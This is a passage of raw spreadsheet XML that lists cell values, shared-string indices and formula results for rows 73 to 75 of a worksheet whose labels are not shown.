      <c r="NF73" s="127"/>
      <c r="NG73" s="127"/>
      <c r="NH73" s="127"/>
      <c r="NI73" s="127"/>
      <c r="NJ73" s="127"/>
      <c r="NK73" s="127"/>
      <c r="NL73" s="127"/>
      <c r="NM73" s="127"/>
      <c r="NN73" s="127"/>
      <c r="NO73" s="127"/>
      <c r="NP73" s="127"/>
      <c r="NQ73" s="127"/>
      <c r="NR73" s="127"/>
      <c r="NS73" s="127"/>
      <c r="NT73" s="127"/>
      <c r="NU73" s="127"/>
      <c r="NV73" s="127"/>
      <c r="NW73" s="127"/>
      <c r="NX73" s="127"/>
      <c r="NY73" s="127"/>
    </row>
    <row r="74" ht="153.75" customHeight="1">
      <c r="B74" s="89" t="s">
        <v>1373</v>
      </c>
      <c r="C74" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D74" s="90" t="s">
        <v>210</v>
      </c>
      <c r="E74" s="90" t="s">
        <v>1411</v>
      </c>
      <c r="F74" s="90" t="s">
        <v>1412</v>
      </c>
      <c r="G74" s="91" t="s">
        <v>1413</v>
      </c>
      <c r="H74" s="90" t="s">
        <v>1414</v>
      </c>
      <c r="I74" s="92" t="s">
        <v>1415</v>
      </c>
      <c r="J74" s="92" t="s">
        <v>1416</v>
      </c>
      <c r="K74" s="92" t="s">
        <v>1417</v>
      </c>
      <c r="L74" s="93" t="s">
        <v>679</v>
      </c>
      <c r="M74" s="93">
        <v>5180.0</v>
      </c>
      <c r="N74" s="93">
        <v>5173.0</v>
      </c>
      <c r="O74" s="93">
        <v>1.0</v>
      </c>
      <c r="P74" s="93">
        <v>5173.0</v>
      </c>
      <c r="Q74" s="93">
        <f t="shared" si="103"/>
        <v>5173</v>
      </c>
      <c r="R74" s="93">
        <v>5173.0</v>
      </c>
      <c r="S74" s="93">
        <v>0.0</v>
      </c>
      <c r="T74" s="94"/>
      <c r="U74" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V74" s="96" t="s">
        <v>1418</v>
      </c>
      <c r="W74" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X74" s="97" t="s">
        <v>1419</v>
      </c>
      <c r="Y74" s="96" t="s">
        <v>1420</v>
      </c>
      <c r="Z74" s="126" t="s">
        <v>1421</v>
      </c>
      <c r="AA74" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB74" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC74" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD74" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE74" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF74" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG74" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH74" s="99" t="s">
        <v>1422</v>
      </c>
      <c r="AI74" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ74" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK74" s="100">
        <v>402.0</v>
      </c>
      <c r="AL74" s="100">
        <v>1.0</v>
      </c>
      <c r="AM74" s="100">
        <v>669.0</v>
      </c>
      <c r="AN74" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO74" s="100">
        <v>402.0</v>
      </c>
      <c r="AP74" s="100">
        <v>1.0</v>
      </c>
      <c r="AQ74" s="100">
        <v>669.0</v>
      </c>
      <c r="AR74" s="100">
        <v>402.0</v>
      </c>
      <c r="AS74" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT74" s="100">
        <f t="shared" si="149"/>
        <v>402</v>
      </c>
      <c r="AU74" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV74" s="100">
        <v>402.0</v>
      </c>
      <c r="AW74" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX74" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY74" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ74" s="100">
        <v>0.0</v>
      </c>
      <c r="BA74" s="102">
        <v>5179.0</v>
      </c>
      <c r="BB74" s="102">
        <v>618.0</v>
      </c>
      <c r="BC74" s="102">
        <v>669.0</v>
      </c>
      <c r="BD74" s="102">
        <v>669.0</v>
      </c>
      <c r="BE74" s="102">
        <v>0.0</v>
      </c>
      <c r="BF74" s="102">
        <v>0.0</v>
      </c>
      <c r="BG74" s="102">
        <v>0.0</v>
      </c>
      <c r="BH74" s="102">
        <v>0.0</v>
      </c>
      <c r="BI74" s="102">
        <v>618.0</v>
      </c>
      <c r="BJ74" s="102">
        <v>669.0</v>
      </c>
      <c r="BK74" s="102">
        <v>669.0</v>
      </c>
      <c r="BL74" s="103">
        <f t="shared" si="112"/>
        <v>0.1194664605</v>
      </c>
      <c r="BM74" s="103">
        <f t="shared" si="113"/>
        <v>0.1194664605</v>
      </c>
      <c r="BN74" s="103">
        <f t="shared" si="114"/>
        <v>0</v>
      </c>
      <c r="BO74" s="103">
        <f t="shared" si="115"/>
        <v>0.1293253431</v>
      </c>
      <c r="BP74" s="103">
        <f t="shared" si="116"/>
        <v>0.1293253431</v>
      </c>
      <c r="BQ74" s="103">
        <f t="shared" si="117"/>
        <v>0</v>
      </c>
      <c r="BR74" s="103">
        <f t="shared" si="118"/>
        <v>0.1293253431</v>
      </c>
      <c r="BS74" s="103">
        <f t="shared" si="119"/>
        <v>0.1293253431</v>
      </c>
      <c r="BT74" s="103">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BU74" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV74" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW74" s="104">
        <v>402.0</v>
      </c>
      <c r="BX74" s="104">
        <v>1.0</v>
      </c>
      <c r="BY74" s="104">
        <v>669.0</v>
      </c>
      <c r="BZ74" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA74" s="104">
        <v>402.0</v>
      </c>
      <c r="CB74" s="104">
        <v>1.0</v>
      </c>
      <c r="CC74" s="104">
        <v>669.0</v>
      </c>
      <c r="CD74" s="104">
        <v>402.0</v>
      </c>
      <c r="CE74" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF74" s="104">
        <f t="shared" si="121"/>
        <v>402</v>
      </c>
      <c r="CG74" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH74" s="104">
        <v>402.0</v>
      </c>
      <c r="CI74" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ74" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK74" s="104">
        <v>0.0</v>
      </c>
      <c r="CL74" s="104">
        <v>0.0</v>
      </c>
      <c r="CM74" s="105">
        <v>5161.0</v>
      </c>
      <c r="CN74" s="105">
        <v>618.0</v>
      </c>
      <c r="CO74" s="105">
        <v>669.0</v>
      </c>
      <c r="CP74" s="105">
        <v>669.0</v>
      </c>
      <c r="CQ74" s="105">
        <v>0.0</v>
      </c>
      <c r="CR74" s="105">
        <v>669.0</v>
      </c>
      <c r="CS74" s="105">
        <v>0.0</v>
      </c>
      <c r="CT74" s="105">
        <v>0.0</v>
      </c>
      <c r="CU74" s="105">
        <v>0.0</v>
      </c>
      <c r="CV74" s="105">
        <v>0.0</v>
      </c>
      <c r="CW74" s="105">
        <v>618.0</v>
      </c>
      <c r="CX74" s="105">
        <v>669.0</v>
      </c>
      <c r="CY74" s="105">
        <v>669.0</v>
      </c>
      <c r="CZ74" s="105">
        <v>0.0</v>
      </c>
      <c r="DA74" s="105">
        <v>669.0</v>
      </c>
      <c r="DB74" s="106">
        <f t="shared" si="122"/>
        <v>0.1194664605</v>
      </c>
      <c r="DC74" s="106">
        <f t="shared" si="123"/>
        <v>0.1194664605</v>
      </c>
      <c r="DD74" s="106">
        <f t="shared" si="124"/>
        <v>0</v>
      </c>
      <c r="DE74" s="106">
        <f t="shared" si="125"/>
        <v>0.1293253431</v>
      </c>
      <c r="DF74" s="106">
        <f t="shared" si="126"/>
        <v>0.1293253431</v>
      </c>
      <c r="DG74" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH74" s="106">
        <f t="shared" si="127"/>
        <v>0.1293253431</v>
      </c>
      <c r="DI74" s="106">
        <f t="shared" si="128"/>
        <v>0.1293253431</v>
      </c>
      <c r="DJ74" s="106">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="DK74" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL74" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM74" s="108" t="s">
        <v>1423</v>
      </c>
      <c r="DN74" s="108">
        <v>2.0</v>
      </c>
      <c r="DO74" s="108">
        <v>690.0</v>
      </c>
      <c r="DP74" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ74" s="108" t="s">
        <v>1423</v>
      </c>
      <c r="DR74" s="108">
        <v>2.0</v>
      </c>
      <c r="DS74" s="108">
        <v>690.0</v>
      </c>
      <c r="DT74" s="108" t="s">
        <v>1423</v>
      </c>
      <c r="DU74" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV74" s="108" t="str">
        <f t="shared" si="150"/>
        <v>402, 54827</v>
      </c>
      <c r="DW74" s="108">
        <v>54827.0</v>
      </c>
      <c r="DX74" s="108">
        <v>402.0</v>
      </c>
      <c r="DY74" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ74" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA74" s="108">
        <v>0.0</v>
      </c>
      <c r="EB74" s="108">
        <v>0.0</v>
      </c>
      <c r="EC74" s="109">
        <v>5179.0</v>
      </c>
      <c r="ED74" s="109">
        <v>618.0</v>
      </c>
      <c r="EE74" s="109">
        <v>690.0</v>
      </c>
      <c r="EF74" s="109">
        <v>690.0</v>
      </c>
      <c r="EG74" s="109">
        <v>0.0</v>
      </c>
      <c r="EH74" s="109">
        <v>690.0</v>
      </c>
      <c r="EI74" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ74" s="109">
        <v>0.0</v>
      </c>
      <c r="EK74" s="109">
        <v>0.0</v>
      </c>
      <c r="EL74" s="109">
        <v>0.0</v>
      </c>
      <c r="EM74" s="109">
        <v>618.0</v>
      </c>
      <c r="EN74" s="109">
        <v>690.0</v>
      </c>
      <c r="EO74" s="109">
        <v>690.0</v>
      </c>
      <c r="EP74" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ74" s="109">
        <v>690.0</v>
      </c>
      <c r="ER74" s="110">
        <f t="shared" si="130"/>
        <v>0.1194664605</v>
      </c>
      <c r="ES74" s="110">
        <f t="shared" si="131"/>
        <v>0.1194664605</v>
      </c>
      <c r="ET74" s="110">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="EU74" s="110">
        <f t="shared" si="133"/>
        <v>0.133384883</v>
      </c>
      <c r="EV74" s="110">
        <f t="shared" si="134"/>
        <v>0.133384883</v>
      </c>
      <c r="EW74" s="110">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="EX74" s="110">
        <f t="shared" si="136"/>
        <v>0.133384883</v>
      </c>
      <c r="EY74" s="110">
        <f t="shared" si="137"/>
        <v>0.133384883</v>
      </c>
      <c r="EZ74" s="110">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="FA74" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB74" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC74" s="111" t="s">
        <v>1424</v>
      </c>
      <c r="FD74" s="111">
        <v>7.0</v>
      </c>
      <c r="FE74" s="111">
        <v>1389.0</v>
      </c>
      <c r="FF74" s="101" t="s">
        <v>1354</v>
      </c>
      <c r="FG74" s="111" t="s">
        <v>1425</v>
      </c>
      <c r="FH74" s="111">
        <v>4.0</v>
      </c>
      <c r="FI74" s="111">
        <v>699.0</v>
      </c>
      <c r="FJ74" s="111" t="s">
        <v>1426</v>
      </c>
      <c r="FK74" s="111" t="s">
        <v>1354</v>
      </c>
      <c r="FL74" s="111" t="str">
        <f t="shared" si="95"/>
        <v>2002749, 2100402, 2002752, 2100254, 2013514, 54827, 402</v>
      </c>
      <c r="FM74" s="111" t="s">
        <v>696</v>
      </c>
      <c r="FN74" s="111" t="s">
        <v>1427</v>
      </c>
      <c r="FO74" s="111">
        <v>2100254.0</v>
      </c>
      <c r="FP74" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ74" s="111">
        <v>1.0</v>
      </c>
      <c r="FR74" s="111">
        <v>8.0</v>
      </c>
      <c r="FS74" s="112">
        <v>5161.0</v>
      </c>
      <c r="FT74" s="112">
        <v>625.0</v>
      </c>
      <c r="FU74" s="112">
        <v>715.0</v>
      </c>
      <c r="FV74" s="112">
        <v>690.0</v>
      </c>
      <c r="FW74" s="112">
        <v>699.0</v>
      </c>
      <c r="FX74" s="112">
        <v>699.0</v>
      </c>
      <c r="FY74" s="112">
        <v>8.0</v>
      </c>
      <c r="FZ74" s="112">
        <v>0.0</v>
      </c>
      <c r="GA74" s="112">
        <v>8.0</v>
      </c>
      <c r="GB74" s="112">
        <v>8.0</v>
      </c>
      <c r="GC74" s="112">
        <v>624.0</v>
      </c>
      <c r="GD74" s="112">
        <v>698.0</v>
      </c>
      <c r="GE74" s="112">
        <v>690.0</v>
      </c>
      <c r="GF74" s="112">
        <v>9.0</v>
      </c>
      <c r="GG74" s="112">
        <v>690.0</v>
      </c>
      <c r="GH74" s="113">
        <f t="shared" si="139"/>
        <v>0.1208196404</v>
      </c>
      <c r="GI74" s="113">
        <f t="shared" si="140"/>
        <v>0.120626329</v>
      </c>
      <c r="GJ74" s="113">
        <f t="shared" si="141"/>
        <v>0.001546491398</v>
      </c>
      <c r="GK74" s="113">
        <f t="shared" si="142"/>
        <v>0.1382176687</v>
      </c>
      <c r="GL74" s="113">
        <f t="shared" si="143"/>
        <v>0.1349313744</v>
      </c>
      <c r="GM74" s="113">
        <f t="shared" si="144"/>
        <v>0.001546491398</v>
      </c>
      <c r="GN74" s="113">
        <f t="shared" si="145"/>
        <v>0.1351246859</v>
      </c>
      <c r="GO74" s="113">
        <f t="shared" si="146"/>
        <v>0.133384883</v>
      </c>
      <c r="GP74" s="113">
        <f t="shared" si="147"/>
        <v>0.001546491398</v>
      </c>
      <c r="GQ74" s="114">
        <f t="shared" si="108"/>
        <v>0.001546192501</v>
      </c>
      <c r="GR74" s="113">
        <f t="shared" si="109"/>
        <v>1</v>
      </c>
      <c r="GS74" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT74" s="94" t="s">
        <v>1428</v>
      </c>
      <c r="GU74" s="147">
        <v>48370.0</v>
      </c>
      <c r="GV74" s="116">
        <v>1.0</v>
      </c>
      <c r="GW74" s="116">
        <v>21.0</v>
      </c>
      <c r="GX74" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY74" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ74" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA74" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB74" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC74" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD74" s="131">
        <v>48370.0</v>
      </c>
      <c r="HE74" s="131">
        <v>48370.0</v>
      </c>
      <c r="HF74" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG74" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH74" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI74" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ74" s="93" t="s">
        <v>1429</v>
      </c>
      <c r="HK74" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL74" s="93">
        <v>26.0</v>
      </c>
      <c r="HM74" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN74" s="93">
        <v>0.0</v>
      </c>
      <c r="HO74" s="93">
        <v>0.0</v>
      </c>
      <c r="HP74" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ74" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR74" s="118">
        <f t="shared" si="54"/>
        <v>0.0001932740626</v>
      </c>
      <c r="HS74" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT74" s="139" t="s">
        <v>1430</v>
      </c>
      <c r="HU74" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV74" s="119">
        <v>18870.0</v>
      </c>
      <c r="HW74" s="119">
        <v>1.0</v>
      </c>
      <c r="HX74" s="119">
        <v>1.0</v>
      </c>
      <c r="HY74" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ74" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA74" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB74" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC74" s="120">
        <f t="shared" ref="IC74:IC77" si="152">HV74</f>
        <v>18870</v>
      </c>
      <c r="ID74" s="120">
        <v>18870.0</v>
      </c>
      <c r="IE74" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF74" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG74" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH74" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II74" s="99" t="s">
        <v>1431</v>
      </c>
      <c r="IJ74" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK74" s="99">
        <v>5161.0</v>
      </c>
      <c r="IL74" s="99">
        <v>1.0</v>
      </c>
      <c r="IM74" s="121">
        <f t="shared" si="97"/>
        <v>5161</v>
      </c>
      <c r="IN74" s="122" t="s">
        <v>1432</v>
      </c>
      <c r="IO74" s="98">
        <v>5161.0</v>
      </c>
      <c r="IP74" s="123">
        <f t="shared" si="58"/>
        <v>0.9976802629</v>
      </c>
      <c r="IQ74" s="118">
        <f t="shared" si="59"/>
        <v>0.9974874372</v>
      </c>
      <c r="IR74" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS74" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT74" s="127"/>
      <c r="IU74" s="127"/>
      <c r="IV74" s="127"/>
      <c r="IW74" s="127"/>
      <c r="IX74" s="127"/>
      <c r="IY74" s="127"/>
      <c r="IZ74" s="127"/>
      <c r="JA74" s="127"/>
      <c r="JB74" s="127"/>
      <c r="JC74" s="127"/>
      <c r="JD74" s="127"/>
      <c r="JE74" s="127"/>
      <c r="JF74" s="127"/>
      <c r="JG74" s="127"/>
      <c r="JH74" s="127"/>
      <c r="JI74" s="127"/>
      <c r="JJ74" s="127"/>
      <c r="JK74" s="127"/>
      <c r="JL74" s="127"/>
      <c r="JM74" s="127"/>
      <c r="JN74" s="127"/>
      <c r="JO74" s="127"/>
      <c r="JP74" s="127"/>
      <c r="JQ74" s="127"/>
      <c r="JR74" s="127"/>
      <c r="JS74" s="127"/>
      <c r="JT74" s="127"/>
      <c r="JU74" s="127"/>
      <c r="JV74" s="127"/>
      <c r="JW74" s="127"/>
      <c r="JX74" s="127"/>
      <c r="JY74" s="127"/>
      <c r="JZ74" s="127"/>
      <c r="KA74" s="127"/>
      <c r="KB74" s="127"/>
      <c r="KC74" s="127"/>
      <c r="KD74" s="127"/>
      <c r="KE74" s="127"/>
      <c r="KF74" s="127"/>
      <c r="KG74" s="127"/>
      <c r="KH74" s="127"/>
      <c r="KI74" s="127"/>
      <c r="KJ74" s="127"/>
      <c r="KK74" s="127"/>
      <c r="KL74" s="127"/>
      <c r="KM74" s="127"/>
      <c r="KN74" s="127"/>
      <c r="KO74" s="127"/>
      <c r="KP74" s="127"/>
      <c r="KQ74" s="127"/>
      <c r="KR74" s="127"/>
      <c r="KS74" s="127"/>
      <c r="KT74" s="127"/>
      <c r="KU74" s="127"/>
      <c r="KV74" s="127"/>
      <c r="KW74" s="127"/>
      <c r="KX74" s="127"/>
      <c r="KY74" s="127"/>
      <c r="KZ74" s="127"/>
      <c r="LA74" s="127"/>
      <c r="LB74" s="127"/>
      <c r="LC74" s="127"/>
      <c r="LD74" s="127"/>
      <c r="LE74" s="127"/>
      <c r="LF74" s="127"/>
      <c r="LG74" s="127"/>
      <c r="LH74" s="127"/>
      <c r="LI74" s="127"/>
      <c r="LJ74" s="127"/>
      <c r="LK74" s="127"/>
      <c r="LL74" s="127"/>
      <c r="LM74" s="127"/>
      <c r="LN74" s="127"/>
      <c r="LO74" s="127"/>
      <c r="LP74" s="127"/>
      <c r="LQ74" s="127"/>
      <c r="LR74" s="127"/>
      <c r="LS74" s="127"/>
      <c r="LT74" s="127"/>
      <c r="LU74" s="127"/>
      <c r="LV74" s="127"/>
      <c r="LW74" s="127"/>
      <c r="LX74" s="127"/>
      <c r="LY74" s="127"/>
      <c r="LZ74" s="127"/>
      <c r="MA74" s="127"/>
      <c r="MB74" s="127"/>
      <c r="MC74" s="127"/>
      <c r="MD74" s="127"/>
      <c r="ME74" s="127"/>
      <c r="MF74" s="127"/>
      <c r="MG74" s="127"/>
      <c r="MH74" s="127"/>
      <c r="MI74" s="127"/>
      <c r="MJ74" s="127"/>
      <c r="MK74" s="127"/>
      <c r="ML74" s="127"/>
      <c r="MM74" s="127"/>
      <c r="MN74" s="127"/>
      <c r="MO74" s="127"/>
      <c r="MP74" s="127"/>
      <c r="MQ74" s="127"/>
      <c r="MR74" s="127"/>
      <c r="MS74" s="127"/>
      <c r="MT74" s="127"/>
      <c r="MU74" s="127"/>
      <c r="MV74" s="127"/>
      <c r="MW74" s="127"/>
      <c r="MX74" s="127"/>
      <c r="MY74" s="127"/>
      <c r="MZ74" s="127"/>
      <c r="NA74" s="127"/>
      <c r="NB74" s="127"/>
      <c r="NC74" s="127"/>
      <c r="ND74" s="127"/>
      <c r="NE74" s="127"/>
      <c r="NF74" s="127"/>
      <c r="NG74" s="127"/>
      <c r="NH74" s="127"/>
      <c r="NI74" s="127"/>
      <c r="NJ74" s="127"/>
      <c r="NK74" s="127"/>
      <c r="NL74" s="127"/>
      <c r="NM74" s="127"/>
      <c r="NN74" s="127"/>
      <c r="NO74" s="127"/>
      <c r="NP74" s="127"/>
      <c r="NQ74" s="127"/>
      <c r="NR74" s="127"/>
      <c r="NS74" s="127"/>
      <c r="NT74" s="127"/>
      <c r="NU74" s="127"/>
      <c r="NV74" s="127"/>
      <c r="NW74" s="127"/>
      <c r="NX74" s="127"/>
      <c r="NY74" s="127"/>
    </row>
    <row r="75" ht="153.75" customHeight="1">
      <c r="B75" s="89" t="s">
        <v>1373</v>
      </c>
      <c r="C75" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D75" s="90" t="s">
        <v>210</v>
      </c>
      <c r="E75" s="90" t="s">
        <v>1411</v>
      </c>
      <c r="F75" s="90" t="s">
        <v>1412</v>
      </c>
      <c r="G75" s="91" t="s">
        <v>1413</v>
      </c>
      <c r="H75" s="90" t="s">
        <v>1414</v>
      </c>
      <c r="I75" s="92" t="s">
        <v>1433</v>
      </c>
      <c r="J75" s="92" t="s">
        <v>606</v>
      </c>
      <c r="K75" s="92" t="s">
        <v>1434</v>
      </c>
      <c r="L75" s="93" t="s">
        <v>1435</v>
      </c>
      <c r="M75" s="93">
        <v>1426.0</v>
      </c>
      <c r="N75" s="93">
        <v>1.0</v>
      </c>
      <c r="O75" s="93">
        <v>0.0</v>
      </c>
      <c r="P75" s="93">
        <v>1.0</v>
      </c>
      <c r="Q75" s="93">
        <f t="shared" si="103"/>
        <v>1</v>
      </c>
      <c r="R75" s="93">
        <v>1.0</v>
      </c>
      <c r="S75" s="93">
        <v>0.0</v>
      </c>
      <c r="T75" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U75" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V75" s="96" t="s">
        <v>1436</v>
      </c>
      <c r="W75" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X75" s="97" t="s">
        <v>1437</v>
      </c>
      <c r="Y75" s="96" t="s">
        <v>1438</v>
      </c>
      <c r="Z75" s="126" t="s">
        <v>1439</v>
      </c>
      <c r="AA75" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB75" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC75" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD75" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE75" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF75" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG75" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH75" s="99" t="s">
        <v>1440</v>
      </c>
      <c r="AI75" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ75" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK75" s="100">
        <v>402.0</v>
      </c>
      <c r="AL75" s="100">
        <v>1.0</v>
      </c>
      <c r="AM75" s="100">
        <v>12.0</v>
      </c>
      <c r="AN75" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO75" s="100">
        <v>402.0</v>
      </c>
      <c r="AP75" s="100">
        <v>1.0</v>
      </c>
      <c r="AQ75" s="100">
        <v>12.0</v>
      </c>
      <c r="AR75" s="100">
        <v>402.0</v>
      </c>
      <c r="AS75" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT75" s="100">
        <f t="shared" si="149"/>
        <v>402</v>
      </c>
      <c r="AU75" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV75" s="100">
        <v>402.0</v>
      </c>
      <c r="AW75" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX75" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY75" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ75" s="100">
        <v>0.0</v>
      </c>
      <c r="BA75" s="102">
        <v>1427.0</v>
      </c>
      <c r="BB75" s="102">
        <v>12.0</v>
      </c>
      <c r="BC75" s="102">
        <v>12.0</v>
      </c>
      <c r="BD75" s="102">
        <v>12.0</v>
      </c>
      <c r="BE75" s="102">
        <v>0.0</v>
      </c>
      <c r="BF75" s="102">
        <v>0.0</v>
      </c>
      <c r="BG75" s="102">
        <v>0.0</v>
      </c>
      <c r="BH75" s="102">
        <v>0.0</v>
      </c>
      <c r="BI75" s="102">
        <v>12.0</v>
      </c>
      <c r="BJ75" s="102">
        <v>12.0</v>
      </c>
      <c r="BK75" s="102">
        <v>12.0</v>
      </c>
      <c r="BL75" s="103">
        <f t="shared" si="112"/>
        <v>12</v>
      </c>
      <c r="BM75" s="103">
        <f t="shared" si="113"/>
        <v>12</v>
      </c>
      <c r="BN75" s="103">
        <f t="shared" si="114"/>
        <v>0</v>
      </c>
      <c r="BO75" s="103">
        <f t="shared" si="115"/>
        <v>12</v>
      </c>
      <c r="BP75" s="103">
        <f t="shared" si="116"/>
        <v>12</v>
      </c>
      <c r="BQ75" s="103">
        <f t="shared" si="117"/>
        <v>0</v>
      </c>
      <c r="BR75" s="103">
        <f t="shared" si="118"/>
        <v>12</v>
      </c>
      <c r="BS75" s="103">
        <f t="shared" si="119"/>
        <v>12</v>
      </c>
      <c r="BT75" s="103">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BU75" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV75" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW75" s="104">
        <v>402.0</v>
      </c>
      <c r="BX75" s="104">
        <v>1.0</v>
      </c>
      <c r="BY75" s="104">
        <v>12.0</v>
      </c>
      <c r="BZ75" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA75" s="104">
        <v>402.0</v>
      </c>
      <c r="CB75" s="104">
        <v>1.0</v>
      </c>
      <c r="CC75" s="104">
        <v>12.0</v>
      </c>
      <c r="CD75" s="104">
        <v>402.0</v>
      </c>
      <c r="CE75" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF75" s="104">
        <f t="shared" si="121"/>
        <v>402</v>
      </c>
      <c r="CG75" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH75" s="104">
        <v>402.0</v>
      </c>
      <c r="CI75" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ75" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK75" s="104">
        <v>0.0</v>
      </c>
      <c r="CL75" s="104">
        <v>0.0</v>
      </c>
      <c r="CM75" s="105">
        <v>1425.0</v>
      </c>
      <c r="CN75" s="105">
        <v>12.0</v>
      </c>
      <c r="CO75" s="105">
        <v>12.0</v>
      </c>
      <c r="CP75" s="105">
        <v>12.0</v>
      </c>
      <c r="CQ75" s="105">
        <v>0.0</v>
      </c>
      <c r="CR75" s="105">
        <v>12.0</v>
      </c>
      <c r="CS75" s="105">
        <v>0.0</v>
      </c>
      <c r="CT75" s="105">
        <v>0.0</v>
      </c>
      <c r="CU75" s="105">
        <v>0.0</v>
      </c>
      <c r="CV75" s="105">
        <v>0.0</v>
      </c>
      <c r="CW75" s="105">
        <v>12.0</v>
      </c>
      <c r="CX75" s="105">
        <v>12.0</v>
      </c>
      <c r="CY75" s="105">
        <v>12.0</v>
      </c>
      <c r="CZ75" s="105">
        <v>0.0</v>
      </c>
      <c r="DA75" s="105">
        <v>12.0</v>
      </c>
      <c r="DB75" s="106">
        <f t="shared" si="122"/>
        <v>12</v>
      </c>
      <c r="DC75" s="106">
        <f t="shared" si="123"/>
        <v>12</v>
      </c>
      <c r="DD75" s="106">
        <f t="shared" si="124"/>
        <v>0</v>
      </c>
      <c r="DE75" s="106">
        <f t="shared" si="125"/>
        <v>12</v>
      </c>
      <c r="DF75" s="106">
        <f t="shared" si="126"/>
        <v>12</v>
      </c>
      <c r="DG75" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH75" s="106">
        <f t="shared" si="127"/>
